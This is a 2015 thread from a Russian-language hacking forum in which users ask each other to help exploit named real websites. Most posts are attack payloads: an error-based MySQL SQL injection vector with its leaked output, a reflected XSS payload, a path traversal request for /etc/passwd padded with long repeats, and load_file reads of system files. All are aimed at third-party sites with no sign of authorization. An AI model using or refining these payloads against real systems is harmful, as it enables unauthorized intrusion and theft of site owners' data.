ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.05.2015, 12:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
select user() показывает что я dbauser@server.
в load_file('/etc/hosts') указывается строка: "209.200.x.x server server.site.com"
сам сайт находится на ип 209.200.x.x. реальный путь раскрыл, но файлы не читает.
Что в данном случае показывает запись в хостсе? не логично ли что я нахожусь на нужной машине и все должно читаться?
|
|
|
|
18.05.2015, 14:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от Unknowhacker
Unknowhacker said:
↑
На кавычку вроде реагирует, но не знаю, считается ли это SQL-Инъекцией
Код:
Code:
www.chromecrm.com/wyniki-wyszukiwania/?id=109&asId=as0'
по моему нету
|
|
|
|
18.05.2015, 15:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Код:
Code:
http://www.coreknowledge.org/m'
Помогите раскрутить |
|
|
|
18.05.2015, 15:51
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
Код:
Code:
http://www.coreknowledge.org/m'
Помогите раскрутить GET /m'|(select*from(select+name_const(version(),1),nam e_const(version(),1))a)='1
однако name_const здесь не сработает, нужен другой вектор. сейчас посмотрю
UPD:
GET /m'||1%20group%20by%20concat((select%20table_name%2 0from%20information_schema.tables%20limit%200,1),f loor(rand(0)*2))having%20min(0)='1
SQL: select * from mimik_Menus where lookup_code = 'm'||1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))having min(0)='1'
MySQL_ERROR: Duplicate entry 'CHARACTER_SETS1' for key 1
|
|
|
18.05.2015, 16:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
|
|
|
|
18.05.2015, 16:33
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
http://astrodaily.ru/statya.php?s=lol/../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
|
|
|
|
18.05.2015, 16:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
Код:
Code:
http://www.coreknowledge.org/m'
Помогите раскрутить В догонку к тому что faza02 написал
Код HTML:
HTML:
http://www.coreknowledge.org/mimik/mimik_live_data/view.php?id=194&sp_id=4&type=%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E&q=search
поиск.. id=194 строго, все что отличается от этого скул ошибка и
SQL: SELECT 1 FROM Fields WHERE type='Group Permission' AND table_id=
MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
параметh sp_id, если оставить пустым - ошибка
SQL: select name from mimik_Standalone_Pages where id =
MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Скорее всего тоже можно раскрутить по образу как faza02 написал... параметр type не фильтруется, что в примере выше и показал, ксс отраженная проходит на ура.
|
|
|
|
18.05.2015, 17:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
|
|
|
|
18.05.2015, 17:35
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
я ж скинул вектор, что не так? там все нормально крутится и не сложно
Код:
Code:
http://www.coreknowledge.org/m%27||1%20group%20by%20concat%28%28select%20table_name%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29having%20min%280%29=%271
|
|
|
|
18.05.2015, 22:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Тут можно что нибудь сделать?
Код:
Code:
http://www.woodworkersworkshop.com/resources/index.php?search=asfasfasf
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
